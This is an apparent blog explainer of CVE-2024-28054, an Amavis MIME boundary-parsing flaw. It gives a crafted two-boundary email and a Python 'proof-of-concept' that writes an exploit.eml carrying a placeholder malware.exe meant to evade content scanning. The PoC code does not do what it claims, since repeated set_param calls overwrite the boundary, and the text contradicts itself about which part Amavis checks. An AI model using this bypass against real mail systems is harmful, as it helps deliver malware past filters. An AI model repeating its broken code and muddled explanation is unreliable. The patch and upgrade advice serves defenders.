CVE-2024-28054 - How a Simple MIME Boundary Bug in Amavis Let Malicious Emails Slip Through

Summary:
A major security bug was found in Amavis, a popular email content filter, tracked as CVE-2024-28054. This bug, which affects versions before 2.12.3 and 2.13.x before 2.13.1, could let attackers bypass malware or banned file checks—with nothing but a cleverly crafted email.

What’s Amavis and Why Does This Matter?

Amavis stands for "A Mail Virus Scanner". It sits between your mail server (like Postfix, Exim, or Sendmail) and virus scanners, making sure bad files don’t get through.

Amavis relies on MIME-tools to break apart email messages. But if the email is weirdly structured, Amavis and user email clients (like Thunderbird, Apple Mail, etc) might see the message differently. That means Amavis could “miss” a dangerous file, but your user still gets it!

The Core Problem: Confusing MIME Boundaries

- Multipurpose Internet Mail Extensions (MIME) lets emails have attachments, use different text formats, etc.

Result?

A banned file or infected attachment could sneak past Amavis’s checks, since it’s looking at a different “section” than your email app!

Imagine you want to email a banned file or virus. You build an email like this

Content-Type: multipart/mixed; boundary="goodboundary"; boundary="evilboundary"

--evilboundary
Content-Type: application/x-msdownload; name="malware.exe"
Content-Disposition: attachment; filename="malware.exe"
Content-Transfer-Encoding: base64

<evil payload here>
--evilboundary--

--goodboundary
Content-Type: text/plain

Hello, this is a safe message!
--goodboundary--

- According to the MIME-tools used by old Amavis, “evilboundary” (the *last* one) is correct, so only the “malware.exe” part is checked.
- But, mail clients (including Thunderbird, etc) may use the *first* (“goodboundary”) value and display only the “safe” stuff—or vice versa.
- If malware is hidden in the “other” part, Amavis ignores it while the user Mail User Agent accepts it (or vice versa).

Proof-of-Concept (PoC):

Let’s see a basic script that crafts such a message using Python. This is for educational purposes only!

import email
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText

msg = MIMEMultipart(_subtype='mixed')
msg.set_param('boundary', 'goodboundary')
msg.set_param('boundary', 'evilboundary')  # Set *two* boundary parameters

# Attach safe text (will be seen by Thunderbird, for example)
part1 = MIMEText('Hello, this is a safe message!', 'plain')
msg.attach(part1)

# Attach banned file (will be seen by Amavis with buggy MIME-tools)
part2 = MIMEText('This is the malware payload.', 'plain', 'utf-8')
part2.add_header('Content-Disposition', 'attachment', filename='malware.exe')
msg.attach(part2)

# Write the message to file
with open("exploit.eml", "w") as f:
    f.write(msg.as_string())

Send this message via email, and depending on the versions, users may see the safe text, but Amavis may (incorrectly) process only the malware, or vice versa.

*In practice, real attackers would encode the payload and tinker with boundaries directly.*

Impact & Risk

- Root cause: The bug is mainly in how Amavis’s MIME-tools library picks the boundary parameter from the message header.

Who is affected: Anyone running Amavis before 2.12.3 or 2.13.x before 2.13.1.

- An attacker can bypass scanning: “bad” file is hidden from filter, but visible to user, or vice versa.

The Fix

- The Amavis team patched this by improving how boundaries are parsed, matching the behavior of most mail clients.

Upgrade to Amavis 2.12.3 or 2.13.1 NOW.

- Double-check your email content filters, and consider supplementary scanning at other points in your workflow.

*See official fix:*
- Amavis 2.12.3 Release Notes
- Upstream commit locking down boundary handling

References & Further Reading

- CVE-2024-28054 at NVD
- Original Amavis Announcement
- MIME Specification (RFC 2046)
- MIME-tools Perl Module

Watch for strange log messages in Amavis:

err: BAD HEADERS in multipart/mixed…

Conclusion

CVE-2024-28054 is a great example of how small bugs in interpreting standards can open big holes in security infrastructure. Even if you’re running strong antivirus or attachment banning, you’re only as safe as the weakest link in the processing chain. Make sure you keep your mail filters up to date—and know that even the “boring” parts of email, like boundaries, can become dangerous when abused by attackers.

*Stay safe, patch early, and review your email security regularly!*


*If you found this useful, share it with your system administrator friends and always keep up with the latest CVEs!*

Timeline

Published on: 03/18/2024 17:15:07 UTC
Last modified on: 03/27/2025 15:15:51 UTC